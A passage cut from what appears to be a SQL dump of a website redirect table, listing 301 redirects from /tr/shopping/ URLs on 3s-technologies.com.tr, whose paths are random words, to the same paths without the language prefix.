07:01:36','0000-00-00 00:00:00',301),(74841,'https://3s-technologies.com.tr/tr/shopping/doubt/3083577270.html',NULL,'https://3s-technologies.com.tr/shopping/doubt/3083577270.html','',1,0,'2026-06-11 07:01:40','0000-00-00 00:00:00',301),(74842,'https://3s-technologies.com.tr/tr/shopping/feracity/1749830766.html',NULL,'https://3s-technologies.com.tr/shopping/feracity/1749830766.html','',1,0,'2026-06-11 07:01:42','0000-00-00 00:00:00',301),(74843,'https://3s-technologies.com.tr/tr/shopping/reciter/4013513303.html',NULL,'https://3s-technologies.com.tr/shopping/reciter/4013513303.html','',1,0,'2026-06-11 07:01:47','0000-00-00 00:00:00',301),(74844,'https://3s-technologies.com.tr/tr/shopping/lacquered/1591707962.html',NULL,'https://3s-technologies.com.tr/shopping/lacquered/1591707962.html','',1,0,'2026-06-11 07:01:49','0000-00-00 00:00:00',301),(74845,'https://3s-technologies.com.tr/tr/shopping/encyclic/2375437382.html',NULL,'https://3s-technologies.com.tr/shopping/encyclic/2375437382.html','',1,0,'2026-06-11 07:01:52','0000-00-00 00:00:00',301),(74846,'https://3s-technologies.com.tr/tr/shopping/sifter/3401557222.html',NULL,'https://3s-technologies.com.tr/shopping/sifter/3401557222.html','',1,0,'2026-06-11 07:01:55','0000-00-00 00:00:00',301),(74847,'https://3s-technologies.com.tr/tr/shopping/neath/3718739218.html',NULL,'https://3s-technologies.com.tr/shopping/neath/3718739218.html','',1,0,'2026-06-11 07:01:59','0000-00-00 00:00:00',301),(74848,'https://3s-technologies.com.tr/tr/shopping/lopsided/2823712257.html',NULL,'https://3s-technologies.com.tr/shopping/lopsided/2823712257.html','',1,0,'2026-06-11 07:02:02','0000-00-00 00:00:00',301),(74849,'https://3s-technologies.com.tr/tr/shopping/indazol/4222617236.html',NULL,'https://3s-technologies.com.tr/shopping/indazol/4222617236.html','',1,0,'2026-06-11 07:02:05','0000-00-00 00:00:00',301),(74850,'https://3s-technologies.com.tr/tr/shopping/blamably/2500479733.html',NULL,'https://3s-technologies.com.tr/shopping/blamably/2500479733.html','',1,0,'2026-06-11 07:02:07','0000-00-00 00:00:00',301),(74851,'https://3s-technologies.com.tr/tr/shopping/sorediferous/92637537.html',NULL,'https://3s-technologies.com.tr/shopping/sorediferous/92637537.html','',1,0,'2026-06-11 07:02:11','0000-00-00 00:00:00',301),(74852,'https://3s-technologies.com.tr/tr/shopping/assigning/1939980914.html',NULL,'https://3s-technologies.com.tr/shopping/assigning/1939980914.html','',1,0,'2026-06-11 07:02:13','0000-00-00 00:00:00',301),(74853,'https://3s-technologies.com.tr/tr/shopping/pargeter/3308740733.html',NULL,'https://3s-technologies.com.tr/shopping/pargeter/3308740733.html','',1,0,'2026-06-11 07:02:17','0000-00-00 00:00:00',301),(74854,'https://3s-technologies.com.tr/tr/shopping/ineyeing/757592975.html',NULL,'https://3s-technologies.com.tr/shopping/ineyeing/757592975.html','',1,0,'2026-06-11 07:02:22','0000-00-00 00:00:00',301),(74855,'https://3s-technologies.com.tr/tr/shopping/massier/1245406433.html',NULL,'https://3s-technologies.com.tr/shopping/massier/1245406433.html','',1,0,'2026-06-11 07:02:24','0000-00-00 00:00:00',301),(74856,'https://3s-technologies.com.tr/tr/shopping/rictus/1088675148.html',NULL,'https://3s-technologies.com.tr/shopping/rictus/1088675148.html','',1,0,'2026-06-11 07:02:27','0000-00-00 00:00:00',301),(74857,'https://3s-technologies.com.tr/tr/shopping/trichotomy/2629321920.html',NULL,'https://3s-technologies.com.tr/shopping/trichotomy/2629321920.html','',1,0,'2026-06-11 07:02:30','0000-00-00 00:00:00',301),(74858,'https://3s-technologies.com.tr/tr/shopping/preconceived/2894802744.html',NULL,'https://3s-technologies.com.tr/shopping/preconceived/2894802744.html','',1,0,'2026-06-11 07:02:33','0000-00-00 00:00:00',301),(74859,'https://3s-technologies.com.tr/tr/shopping/emits/2966878119.html',NULL,'https://3s-technologies.com.tr/shopping/emits/2966878119.html','',1,0,'2026-06-11 07:02:36','0000-00-00 00:00:00',301),(74860,'https://3s-technologies.com.tr/tr/shopping/plasmodial/1995535611.html',NULL,'https://3s-technologies.com.tr/shopping/plasmodial/1995535611.html','',1,0,'2026-06-11 07:02:39','0000-00-00 00:00:00',301),(74861,'https://3s-technologies.com.tr/tr/shopping/methought/4146116596.html',NULL,'https://3s-technologies.com.tr/shopping/methought/4146116596.html','',1,0,'2026-06-11 07:02:42','0000-00-00 00:00:00',301),(74862,'https://3s-technologies.com.tr/tr/shopping/ripier/2704634316.html',NULL,'https://3s-technologies.com.tr/shopping/ripier/2704634316.html','',1,0,'2026-06-11 07:02:45','0000-00-00 00:00:00',301),(74863,'https://3s-technologies.com.tr/tr/shopping/solemnization/3641847812.html',NULL,'https://3s-technologies.com.tr/shopping/solemnization/3641847812.html','',1,0,'2026-06-11 07:02:48','0000-00-00 00:00:00',301),(74864,'https://3s-technologies.com.tr/tr/shopping/liner/267088340.html',NULL,'https://3s-technologies.com.tr/shopping/liner/267088340.html','',1,0,'2026-06-11 07:02:51','0000-00-00 00:00:00',301),(74865,'https://3s-technologies.com.tr/tr/shopping/lodgement/853940305.html',NULL,'https://3s-technologies.com.tr/shopping/lodgement/853940305.html','',1,0,'2026-06-11 07:02:54','0000-00-00 00:00:00',301),(74866,'https://3s-technologies.com.tr/tr/shopping/borate/3423229886.html',NULL,'https://3s-technologies.com.tr/shopping/borate/3423229886.html','',1,0,'2026-06-11 07:02:57','0000-00-00 00:00:00',301),(74867,'https://3s-technologies.com.tr/tr/shopping/eiryness/4198856345.html',NULL,'https://3s-technologies.com.tr/shopping/eiryness/4198856345.html','',1,0,'2026-06-11 07:03:00','0000-00-00 00:00:00',301),(74868,'https://3s-technologies.com.tr/tr/shopping/mowing/3349760593.html',NULL,'https://3s-technologies.com.tr/shopping/mowing/3349760593.html','',1,0,'2026-06-11 07:03:03','0000-00-00 00:00:00',301),(74869,'https://3s-technologies.com.tr/tr/shopping/eyries/2884067743.html',NULL,'https://3s-technologies.com.tr/shopping/eyries/2884067743.html','',1,0,'2026-06-11 07:03:06','0000-00-00 00:00:00',301),(74870,'https://3s-technologies.com.tr/tr/shopping/philtering/3588944556.html',NULL,'https://3s-technologies.com.tr/shopping/philtering/3588944556.html','',1,0,'2026-06-11 07:03:09','0000-00-00 00:00:00',301),(74871,'https://3s-technologies.com.tr/tr/shopping/thaliacea/2114613552.html',NULL,'https://3s-technologies.com.tr/shopping/thaliacea/2114613552.html','',1,0,'2026-06-11 07:03:12','0000-00-00 00:00:00',301),(74872,'https://3s-technologies.com.tr/tr/shopping/decalcomanie/1991995383.html',NULL,'https://3s-technologies.com.tr/shopping/decalcomanie/1991995383.html','',1,0,'2026-06-11 07:03:15','0000-00-00 00:00:00',301),(74873,'https://3s-technologies.com.tr/tr/shopping/conceivably/1549476003.html',NULL,'https://3s-technologies.com.tr/shopping/conceivably/1549476003.html','',1,0,'2026-06-11 07:03:18','0000-00-00 00:00:00',301),(74874,'https://3s-technologies.com.tr/tr/shopping/canonizing/1528909998.html',NULL,'https://3s-technologies.com.tr/shopping/canonizing/1528909998.html','',1,0,'2026-06-11 07:03:21','0000-00-00 00:00:00',301),(74875,'https://3s-technologies.com.tr/tr/shopping/petitor/2463655728.html',NULL,'https://3s-technologies.com.tr/shopping/petitor/2463655728.html','',1,0,'2026-06-11 07:03:24','0000-00-00 00:00:00',301),(74876,'https://3s-technologies.com.tr/tr/shopping/fallible/1484349910.html',NULL,'https://3s-technologies.com.tr/shopping/fallible/1484349910.html','',1,0,'2026-06-11 07:03:27','0000-00-00 00:00:00',301),(74877,'https://3s-technologies.com.tr/tr/shopping/browned/491861898.html',NULL,'https://3s-technologies.com.tr/shopping/browned/491861898.html','',1,0,'2026-06-11 07:03:30','0000-00-00 00:00:00',301),(74878,'https://3s-technologies.com.tr/tr/shopping/sebate/4227369563.html',NULL,'https://3s-technologies.com.tr/shopping/sebate/4227369563.html','',1,0,'2026-06-11 07:03:37','0000-00-00 00:00:00',301),(74879,'https://3s-technologies.com.tr/tr/shopping/harasser/186820261.html',NULL,'https://3s-technologies.com.tr/shopping/harasser/186820261.html','',1,0,'2026-06-11 07:03:40','0000-00-00 00:00:00',301),(74880,'https://3s-technologies.com.tr/tr/shopping/ampicillin/3248433725.html',NULL,'https://3s-technologies.com.tr/shopping/ampicillin/3248433725.html','',1,0,'2026-06-11 07:03:43','0000-00-00 00:00:00',301),(74881,'https://3s-technologies.com.tr/tr/shopping/thankless/690042684.html',NULL,'https://3s-technologies.com.tr/shopping/thankless/690042684.html','',1,0,'2026-06-11 07:03:46','0000-00-00 00:00:00',301),(74882,'https://3s-technologies.com.tr/tr/shopping/kingliest/357305554.html',NULL,'https://3s-technologies.com.tr/shopping/kingliest/357305554.html','',1,0,'2026-06-11 07:03:49','0000-00-00 00:00:00',301),(74883,'https://3s-technologies.com.tr/tr/shopping/authochthonic/1417026862.html',NULL,'https://3s-technologies.com.tr/shopping/authochthonic/1417026862.html','',1,0,'2026-06-11 07:03:52','0000-00-00 00:00:00',301),(74884,'https://3s-technologies.com.tr/tr/shopping/etheostomoid/3394534865.html',NULL,'https://3s-technologies.com.tr/shopping/etheostomoid/3394534865.html','',1,0,'2026-06-11 07:03:55','0000-00-00 00:00:00',301),(74885,'https://3s-technologies.com.tr/tr/shopping/stoke/2323077555.html',NULL,'https://3s-technologies.com.tr/shopping/stoke/2323077555.html','',1,0,'2026-06-11 07:03:58','0000-00-00 00:00:00',301),(74886,'https://3s-technologies.com.tr/tr/shopping/deshabille/2703422201.html',NULL,'https://3s-technologies.com.tr/shopping/deshabille/2703422201.html','',1,0,'2026-06-11 07:04:01','0000-00-00 00:00:00',301),(74887,'https://3s-technologies.com.tr/tr/shopping/anthropomorphic/2045340098.html',NULL,'https://3s-technologies.com.tr/shopping/anthropomorphic/2045340098.html','',1,0,'2026-06-11 07:04:04','0000-00-00 00:00:00',301),(74888,'https://3s-technologies.com.tr/tr/shopping/subquadruple/4034958724.html',NULL,'https://3s-technologies.com.tr/shopping/subquadruple/4034958724.html','',1,0,'2026-06-11 07:04:07','0000-00-00 00:00:00',301),(74889,'https://3s-technologies.com.tr/tr/shopping/wardship/3859948379.html',NULL,'https://3s-technologies.com.tr/shopping/wardship/3859948379.html','',1,0,'2026-06-11 07:04:10','0000-00-00 00:00:00',301),(74890,'https://3s-technologies.com.tr/tr/shopping/animation/4104933229.html',NULL,'https://3s-technologies.com.tr/shopping/animation/4104933229.html','',1,0,'2026-06-11 07:04:13','0000-00-00 00:00:00',301),(74891,'https://3s-technologies.com.tr/tr/shopping/besprinkle/1044368341.html',NULL,'https://3s-technologies.com.tr/shopping/besprinkle/1044368341.html','',1,0,'2026-06-11 07:04:16','0000-00-00 00:00:00',301),(74892,'https://3s-technologies.com.tr/tr/shopping/hemostat/1255949458.html',NULL,'https://3s-technologies.com.tr/shopping/hemostat/1255949458.html','',1,0,'2026-06-11 07:04:19','0000-00-00 00:00:00',301),(74893,'https://3s-technologies.com.tr/tr/shopping/samboo/2159016427.html',NULL,'https://3s-technologies.com.tr/shopping/samboo/2159016427.html','',1,0,'2026-06-11 07:04:22','0000-00-00 00:00:00',301),(74894,'https://3s-technologies.com.tr/tr/shopping/ambushment/3569772437.html',NULL,'https://3s-technologies.com.tr/shopping/ambushment/3569772437.html','',1,0,'2026-06-11 07:04:25','0000-00-00 00:00:00',301),(74895,'https://3s-technologies.com.tr/tr/shopping/crippling/569589121.html',NULL,'https://3s-technologies.com.tr/shopping/crippling/569589121.html','',1,0,'2026-06-11 07:04:28','0000-00-00 00:00:00',301),(74896,'https://3s-technologies.com.tr/tr/shopping/leguminous/310650529.html',NULL,'https://3s-technologies.com.tr/shopping/leguminous/310650529.html','',1,0,'2026-06-11 07:04:31','0000-00-00 00:00:00',301),(74897,'https://3s-technologies.com.tr/tr/shopping/inscribable/926242907.html',NULL,'https://3s-technologies.com.tr/shopping/inscribable/926242907.html','',1,0,'2026-06-11 07:04:34','0000-00-00 00:00:00',301),(74898,'https://3s-technologies.com.tr/tr/shopping/draintile/2942999113.html',NULL,'https://3s-technologies.com.tr/shopping/draintile/2942999113.html','',1,0,'2026-06-11 07:04:37','0000-00-00 00:00:00',301),(74899,'https://3s-technologies.com.tr/tr/shopping/cabalistically/3953360447.html',NULL,'https://3s-technologies.com.tr/shopping/cabalistically/3953360447.html','',1,0,'2026-06-11 07:04:40','0000-00-00 00:00:00',301),(74900,'https://3s-technologies.com.tr/tr/shopping/burnedout/2475632532.html',NULL,'https://3s-technologies.com.tr/shopping/burnedout/2475632532.html','',1,0,'2026-06-11 07:04:49','0000-00-00 00:00:00',301),(74901,'https://3s-technologies.com.tr/tr/shopping/imbolden/2755436702.html',NULL,'https://3s-technologies.com.tr/shopping/imbolden/2755436702.html','',1,0,'2026-06-11 07:04:53','0000-00-00 00:00:00',301),(74902,'https://3s-technologies.com.tr/tr/shopping/dotted/1000319333.html',NULL,'https://3s-technologies.com.tr/shopping/dotted/1000319333.html','',1,0,'2026-06-11 07:04:56','0000-00-00 00:00:00',301),(74903,'https://3s-technologies.com.tr/tr/shopping/verger/3179758894.html',NULL,'https://3s-technologies.com.tr/shopping/verger/3179758894.html','',1,0,'2026-06-11 07:04:58','0000-00-00 00:00:00',301),(74904,'https://3s-technologies.com.tr/tr/shopping/pantagraph/2623357494.html',NULL,'https://3s-technologies.com.tr/shopping/pantagraph/2623357494.html','',1,0,'2026-06-11 07:05:02','0000-00-00 00:00:00',301),(74905,'https://3s-technologies.com.tr/tr/shopping/rissa/2825087863.html',NULL,'https://3s-technologies.com.tr/shopping/rissa/2825087863.html','',1,0,'2026-06-11 07:05:04','0000-00-00 00:00:00',301),(74906,'https://3s-technologies.com.tr/tr/shopping/phaenogamia/2303134796.html',NULL,'https://3s-technologies.com.tr/shopping/phaenogamia/2303134796.html','',1,0,'2026-06-11 07:05:08','0000-00-00 00:00:00',301),(74907,'https://3s-technologies.com.tr/tr/shopping/dissector/3112208603.html',NULL,'https://3s-technologies.com.tr/shopping/dissector/3112208603.html','',1,0,'2026-06-11 07:05:11','0000-00-00 00:00:00',301),(74908,'https://3s-technologies.com.tr/tr/shopping/refrigeration/2403720680.html',NULL,'https://3s-technologies.com.tr/shopping/refrigeration/2403720680.html','',1,0,'2026-06-11 07:05:14','0000-00-00 00:00:00',301),(74909,'https://3s-technologies.com.tr/tr/shopping/tailless/1090839722.html',NULL,'https://3s-technologies.com.tr/shopping/tailless/1090839722.html','',1,0,'2026-06-11 07:05:17','0000-00-00 00:00:00',301),(74910,'https://3s-technologies.com.tr/tr/shopping/vitulina/4151917499.html',NULL,'https://3s-technologies.com.tr/shopping/vitulina/4151917499.html','',1,0,'2026-06-11 07:05:20','0000-00-00 00:00:00',301),(74911,'https://3s-technologies.com.tr/tr/shopping/refrigerator/3033216311.html',NULL,'https://3s-technologies.com.tr/shopping/refrigerator/3033216311.html','',1,0,'2026-06-11 07:05:24','0000-00-00 00:00:00',301),(74912,'https://3s-technologies.com.tr/tr/shopping/sharptail/4036170823.html',NULL,'https://3s-technologies.com.tr/shopping/sharptail/4036170823.html','',1,0,'2026-06-11 07:05:26','0000-00-00 00:00:00',301),(74913,'https://3s-technologies.com.tr/tr/shopping/argentate/2502903947.html',NULL,'https://3s-technologies.com.tr/shopping/argentate/2502903947.html','',1,0,'2026-06-11 07:05:29','0000-00-00 00:00:00',301),(74914,'https://3s-technologies.com.tr/tr/shopping/modeller/3808982454.html',NULL,'https://3s-technologies.com.tr/shopping/modeller/3808982454.html','',1,0,'2026-06-11 07:05:32','0000-00-00 00:00:00',301),(74915,'https://3s-technologies.com.tr/tr/shopping/hermetic/1166519013.html',NULL,'https://3s-technologies.com.tr/shopping/hermetic/1166519013.html','',1,0,'2026-06-11 07:05:35','0000-00-00 00:00:00',301),(74916,'https://3s-technologies.com.tr/tr/shopping/sandiver/3271657104.html',NULL,'https://3s-technologies.com.tr/shopping/sandiver/3271657104.html','',1,0,'2026-06-11 07:05:38','0000-00-00 00:00:00',301),(74917,'https://3s-technologies.com.tr/tr/shopping/lesemajesty/237622647.html',NULL,'https://3s-technologies.com.tr/shopping/lesemajesty/237622647.html','',1,0,'2026-06-11 07:05:41','0000-00-00 00:00:00',301),(74918,'https://3s-technologies.com.tr/tr/shopping/burying/1632917399.html',NULL,'https://3s-technologies.com.tr/shopping/burying/1632917399.html','',1,0,'2026-06-11 07:05:44','0000-00-00 00:00:00',301),(74919,'https://3s-technologies.com.tr/tr/shopping/potheen/3086165007.html',NULL,'https://3s-technologies.com.tr/shopping/potheen/3086165007.html','',1,0,'2026-06-11 07:05:47','0000-00-00 00:00:00',301),(74920,'https://3s-technologies.com.tr/tr/shopping/maneating/2099682680.html',NULL,'https://3s-technologies.com.tr/shopping/maneating/2099682680.html','',1,0,'2026-06-11 07:05:50','0000-00-00 00:00:00',301),(74921,'https://3s-technologies.com.tr/tr/shopping/lingenberry/2340777967.html',NULL,'https://3s-technologies.com.tr/shopping/lingenberry/2340777967.html','',1,0,'2026-06-11 07:05:53','0000-00-00 00:00:00',301),(74922,'https://3s-technologies.com.tr/tr/shopping/fibularia/3115844884.html',NULL,'https://3s-technologies.com.tr/shopping/fibularia/3115844884.html','',1,0,'2026-06-11 07:05:56','0000-00-00 00:00:00',301),(74923,'https://3s-technologies.com.tr/tr/shopping/ingeniate/2499527242.html',NULL,'https://3s-technologies.com.tr/shopping/ingeniate/2499527242.html','',1,0,'2026-06-11 07:05:59','0000-00-00 00:00:00',301),(74924,'https://3s-technologies.com.tr/tr/shopping/retreatment/3517854037.html',NULL,'https://3s-technologies.com.tr/shopping/retreatment/3517854037.html','',1,0,'2026-06-11 07:06:02','0000-00-00 00:00:00',301),(74925,'https://3s-technologies.com.tr/tr/shopping/crioceris/1241018586.html',NULL,'https://3s-technologies.com.tr/shopping/crioceris/1241018586.html','',1,0,'2026-06-11 07:06:05','0000-00-00 00:00:00',301),(74926,'https://3s-technologies.com.tr/tr/shopping/pescaprae/1655024780.html',NULL,'https://3s-technologies.com.tr/shopping/pescaprae/1655024780.html','',1,0,'2026-06-11 07:06:08','0000-00-00 00:00:00',301),(74927,'https://3s-technologies.com.tr/tr/shopping/doucepere/3170187482.html',NULL,'https://3s-technologies.com.tr/shopping/doucepere/3170187482.html','',1,0,'2026-06-11 07:06:11','0000-00-00 00:00:00',301),(74928,'https://3s-technologies.com.tr/tr/shopping/scarf/3756382373.html',NULL,'https://3s-technologies.com.tr/shopping/scarf/3756382373.html','',1,0,'2026-06-11 07:06:14','0000-00-00 00:00:00',301),(74929,'https://3s-technologies.com.tr/tr/shopping/rimple/2585321390.html',NULL,'https://3s-technologies.com.tr/shopping/rimple/2585321390.html','',1,0,'2026-06-11 07:06:17','0000-00-00 00:00:00',301),(74930,'https://3s-technologies.com.tr/tr/shopping/enbattled/2392792436.html',NULL,'https://3s-technologies.com.tr/shopping/enbattled/2392792436.html','',1,0,'2026-06-11 07:06:20','0000-00-00 00:00:00',301),(74931,'https://3s-technologies.com.tr/tr/shopping/egocentric/2822759750.html',NULL,'https://3s-technologies.com.tr/shopping/egocentric/2822759750.html','',1,0,'2026-06-11 07:06:23','0000-00-00 00:00:00',301),(74932,'https://3s-technologies.com.tr/tr/shopping/mulatto/1108194776.html',NULL,'https://3s-technologies.com.tr/shopping/mulatto/1108194776.html','',1,0,'2026-06-11 07:06:26','0000-00-00 00:00:00',301),(74933,'https://3s-technologies.com.tr/tr/shopping/arthrostrata/3451743088.html',NULL,'https://3s-technologies.com.tr/shopping/arthrostrata/3451743088.html','',1,0,'2026-06-11 07:06:31','0000-00-00 00:00:00',301),(74934,'https://3s-technologies.com.tr/tr/shopping/disarmament/1847049348.html',NULL,'https://3s-technologies.com.tr/shopping/disarmament/1847049348.html','',1,0,'2026-06-11 07:06:34','0000-00-00 00:00:00',301),(74935,'https://3s-technologies.com.tr/tr/shopping/aircrew/1156808819.html',NULL,'https://3s-technologies.com.tr/shopping/aircrew/1156808819.html','',1,0,'2026-06-11 07:06:37','0000-00-00 00:00:00',301),(74936,'https://3s-technologies.com.tr/tr/shopping/squamella/3830131887.html',NULL,'https://3s-technologies.com.tr/shopping/squamella/3830131887.html','',1,0,'2026-06-11 07:06:40','0000-00-00 00:00:00',301),(74937,'https://3s-technologies.com.tr/tr/shopping/archibald/1157900124.html',NULL,'https://3s-technologies.com.tr/shopping/archibald/1157900124.html','',1,0,'2026-06-11 07:06:43','0000-00-00 00:00:00',301),(74938,'https://3s-technologies.com.tr/tr/shopping/reattain/2308367609.html',NULL,'https://3s-technologies.com.tr/shopping/reattain/2308367609.html','',1,0,'2026-06-11 07:06:46','0000-00-00 00:00:00',301),(74939,'https://3s-technologies.com.tr/tr/shopping/bajadere/500891289.html',NULL,'https://3s-technologies.com.tr/shopping/bajadere/500891289.html','',1,0,'2026-06-11 07:06:49','0000-00-00 00:00:00',301),(74940,'https://3s-technologies.com.tr/tr/shopping/peahen/3892436887.html',NULL,'https://3s-technologies.com.tr/shopping/peahen/3892436887.html','',1,0,'2026-06-11 07:06:52','0000-00-00 00:00:00',301),(74941,'https://3s-technologies.com.tr/tr/shopping/heterogeneal/963320219.html',NULL,'https://3s-technologies.com.tr/shopping/heterogeneal/963320219.html','',1,0,'2026-06-11 07:06:55','0000-00-00 00:00:00',301),(74942,'https://3s-technologies.com.tr/tr/shopping/butyrometer/1325434026.html',NULL,'https://3s-technologies.com.tr/shopping/butyrometer/1325434026.html','',1,0,'2026-06-11 07:06:58','0000-00-00 00:00:00',301),(74943,'https://3s-technologies.com.tr/tr/shopping/defaulter/4117082959.html',NULL,'https://3s-technologies.com.tr/shopping/defaulter/4117082959.html','',1,0,'2026-06-11 07:07:01','0000-00-00 00:00:00',301),(74944,'https://3s-technologies.com.tr/tr/shopping/pococurante/1519988756.html',NULL,'https://3s-technologies.com.tr/shopping/pococurante/1519988756.html','',1,0,'2026-06-11 07:07:04','0000-00-00 00:00:00',301),(74945,'https://3s-technologies.com.tr/tr/shopping/reallege/2176347728.html',NULL,'https://3s-technologies.com.tr/shopping/reallege/2176347728.html','',1,0,'2026-06-11 07:07:07','0000-00-00 00:00:00',301),(74946,'https://3s-technologies.com.tr/tr/shopping/emulsin/2730932063.html',NULL,'https://3s-technologies.com.tr/shopping/emulsin/2730932063.html','',1,0,'2026-06-11 07:07:10','0000-00-00 00:00:00',301),(74947,'https://3s-technologies.com.tr/tr/shopping/idioelectric/1564521920.html',NULL,'https://3s-technologies.com.tr/shopping/idioelectric/1564521920.html','',1,0,'2026-06-11 07:07:13','0000-00-00 00:00:00',301),(74948,'https://3s-technologies.com.tr/tr/shopping/pharaon/2855160721.html',NULL,'https://3s-technologies.com.tr/shopping/pharaon/2855160721.html','',1,0,'2026-06-11 07:07:16','0000-00-00 00:00:00',301),(74949,'https://3s-technologies.com.tr/tr/shopping/hoboy/2914697057.html',NULL,'https://3s-technologies.com.tr/shopping/hoboy/2914697057.html','',1,0,'2026-06-11 07:07:19','0000-00-00 00:00:00',301),(74950,'https://3s-technologies.com.tr/tr/shopping/forbearer/811554210.html',NULL,'https://3s-technologies.com.tr/shopping/forbearer/811554210.html','',1,0,'2026-06-11 07:07:24','0000-00-00 00:00:00',301),(74951,'https://3s-technologies.com.tr/tr/shopping/hoody/72358791.html',NULL,'https://3s-technologies.com.tr/shopping/hoody/72358791.html','',1,0,'2026-06-11 07:07:26','0000-00-00 00:00:00',301),(74952,'https://3s-technologies.com.tr/tr/shopping/brandling/4004746213.html',NULL,'https://3s-technologies.com.tr/shopping/brandling/4004746213.html','',1,0,'2026-06-11 07:07:29','0000-00-00 00:00:00',301),(74953,'https://3s-technologies.com.tr/tr/shopping/semivitrified/1165986411.html',NULL,'https://3s-technologies.com.tr/shopping/semivitrified/1165986411.html','',1,0,'2026-06-11 07:07:32','0000-00-00 00:00:00',301),(74954,'https://3s-technologies.com.tr/tr/shopping/basidiomycetes/3814215283.html',NULL,'https://3s-technologies.com.tr/shopping/basidiomycetes/3814215283.html','',1,0,'2026-06-11 07:07:35','0000-00-00 00:00:00',301),(74955,'https://3s-technologies.com.tr/tr/shopping/beknow/3388642771.html',NULL,'https://3s-technologies.com.tr/shopping/beknow/3388642771.html','',1,0,'2026-06-11 07:07:38','0000-00-00 00:00:00',301),(74956,'https://3s-technologies.com.tr/tr/shopping/insafety/19941115.html',NULL,'https://3s-technologies.com.tr/shopping/insafety/19941115.html','',1,0,'2026-06-11 07:07:41','0000-00-00 00:00:00',301),(74957,'https://3s-technologies.com.tr/tr/shopping/unslaked/710206369.html',NULL,'https://3s-technologies.com.tr/shopping/unslaked/710206369.html','',1,0,'2026-06-11 07:07:44','0000-00-00 00:00:00',301),(74958,'https://3s-technologies.com.tr/tr/shopping/aliturgical/3322468877.html',NULL,'https://3s-technologies.com.tr/shopping/aliturgical/3322468877.html','',1,0,'2026-06-11 07:07:47','0000-00-00 00:00:00',301),(74959,'https://3s-technologies.com.tr/tr/shopping/quirkish/130839363.html',NULL,'https://3s-technologies.com.tr/shopping/quirkish/130839363.html','',1,0,'2026-06-11 07:07:50','0000-00-00 00:00:00',301),(74960,'https://3s-technologies.com.tr/tr/shopping/chrysophrys/3367306094.html',NULL,'https://3s-technologies.com.tr/shopping/chrysophrys/3367306094.html','',1,0,'2026-06-11 07:07:53','0000-00-00 00:00:00',301),(74961,'https://3s-technologies.com.tr/tr/shopping/porousness/2176486526.html',NULL,'https://3s-technologies.com.tr/shopping/porousness/2176486526.html','',1,0,'2026-06-11 07:07:56','0000-00-00 00:00:00',301),(74962,'https://3s-technologies.com.tr/tr/shopping/angurize/4105655423.html',NULL,'https://3s-technologies.com.tr/shopping/angurize/4105655423.html','',1,0,'2026-06-11 07:07:59','0000-00-00 00:00:00',301),(74963,'https://3s-technologies.com.tr/tr/shopping/recreance/86304032.html',NULL,'https://3s-technologies.com.tr/shopping/recreance/86304032.html','',1,0,'2026-06-11 07:08:02','0000-00-00 00:00:00',301),(74964,'https://3s-technologies.com.tr/tr/shopping/bewailment/3562751754.html',NULL,'https://3s-technologies.com.tr/shopping/bewailment/3562751754.html','',1,0,'2026-06-11 07:08:05','0000-00-00 00:00:00',301),(74965,'https://3s-technologies.com.tr/tr/shopping/cartroad/2250270599.html',NULL,'https://3s-technologies.com.tr/shopping/cartroad/2250270599.html','',1,0,'2026-06-11 07:08:08','0000-00-00 00:00:00',301),(74966,'https://3s-technologies.com.tr/tr/shopping/foment/1514187885.html',NULL,'https://3s-technologies.com.tr/shopping/foment/1514187885.html','',1,0,'2026-06-11 07:08:11','0000-00-00 00:00:00',301),(74967,'https://3s-technologies.com.tr/tr/shopping/spermatophore/3054694989.html',NULL,'https://3s-technologies.com.tr/shopping/spermatophore/3054694989.html','',1,0,'2026-06-11 07:08:14','0000-00-00 00:00:00',301),(74968,'https://3s-technologies.com.tr/tr/shopping/scarfing/4066104867.html',NULL,'https://3s-technologies.com.tr/shopping/scarfing/4066104867.html','',1,0,'2026-06-11 07:08:17','0000-00-00 00:00:00',301),(74969,'https://3s-technologies.com.tr/tr/shopping/cantilena/2877474614.html',NULL,'https://3s-technologies.com.tr/shopping/cantilena/2877474614.html','',1,0,'2026-06-11 07:08:20','0000-00-00 00:00:00',301),(74970,'https://3s-technologies.com.tr/tr/shopping/spousebreach/1705229404.html',NULL,'https://3s-technologies.com.tr/shopping/spousebreach/1705229404.html','',1,0,'2026-06-11 07:08:23','0000-00-00 00:00:00',301),(74971,'https://3s-technologies.com.tr/tr/shopping/agency/952767021.html',NULL,'https://3s-technologies.com.tr/shopping/agency/952767021.html','',1,0,'2026-06-11 07:08:31','0000-00-00 00:00:00',301),(74972,'https://3s-technologies.com.tr/tr/shopping/perpetrating/4250985875.html',NULL,'https://3s-technologies.com.tr/shopping/perpetrating/4250985875.html','',1,0,'2026-06-11 07:08:35','0000-00-00 00:00:00',301),(74973,'https://3s-technologies.com.tr/tr/shopping/epiploce/485657820.html',NULL,'https://3s-technologies.com.tr/shopping/epiploce/485657820.html','',1,0,'2026-06-11 07:08:38','0000-00-00 00:00:00',301),(74974,'https://3s-technologies.com.tr/tr/shopping/nominator/4192964283.html',NULL,'https://3s-technologies.com.tr/shopping/nominator/4192964283.html','',1,0,'2026-06-11 07:08:41','0000-00-00 00:00:00',301),(74975,'https://3s-technologies.com.tr/tr/shopping/quietist/3335177278.html',NULL,'https://3s-technologies.com.tr/shopping/quietist/3335177278.html','',1,0,'2026-06-11 07:08:44','0000-00-00 00:00:00',301),(74976,'https://3s-technologies.com.tr/tr/shopping/discomfiture/1822855546.html',NULL,'https://3s-technologies.com.tr/shopping/discomfiture/1822855546.html','',1,0,'2026-06-11 07:08:47','0000-00-00 00:00:00',301),(74977,'https://3s-technologies.com.tr/tr/shopping/dempster/3669188006.html',NULL,'https://3s-technologies.com.tr/shopping/dempster/3669188006.html','',1,0,'2026-06-11 07:08:50','0000-00-00 00:00:00',301),(74978,'https://3s-technologies.com.tr/tr/shopping/fascial/992912543.html',NULL,'https://3s-technologies.com.tr/shopping/fascial/992912543.html','',1,0,'2026-06-11 07:08:53','0000-00-00 00:00:00',301),(74979,'https://3s-technologies.com.tr/tr/shopping/hydracrylic/2443482656.html',NULL,'https://3s-technologies.com.tr/shopping/hydracrylic/2443482656.html','',1,0,'2026-06-11 07:08:56','0000-00-00 00:00:00',301),(74980,'https://3s-technologies.com.tr/tr/shopping/chiggerflower/2771392381.html',NULL,'https://3s-technologies.com.tr/shopping/chiggerflower/2771392381.html','',1,0,'2026-06-11 07:08:59','0000-00-00 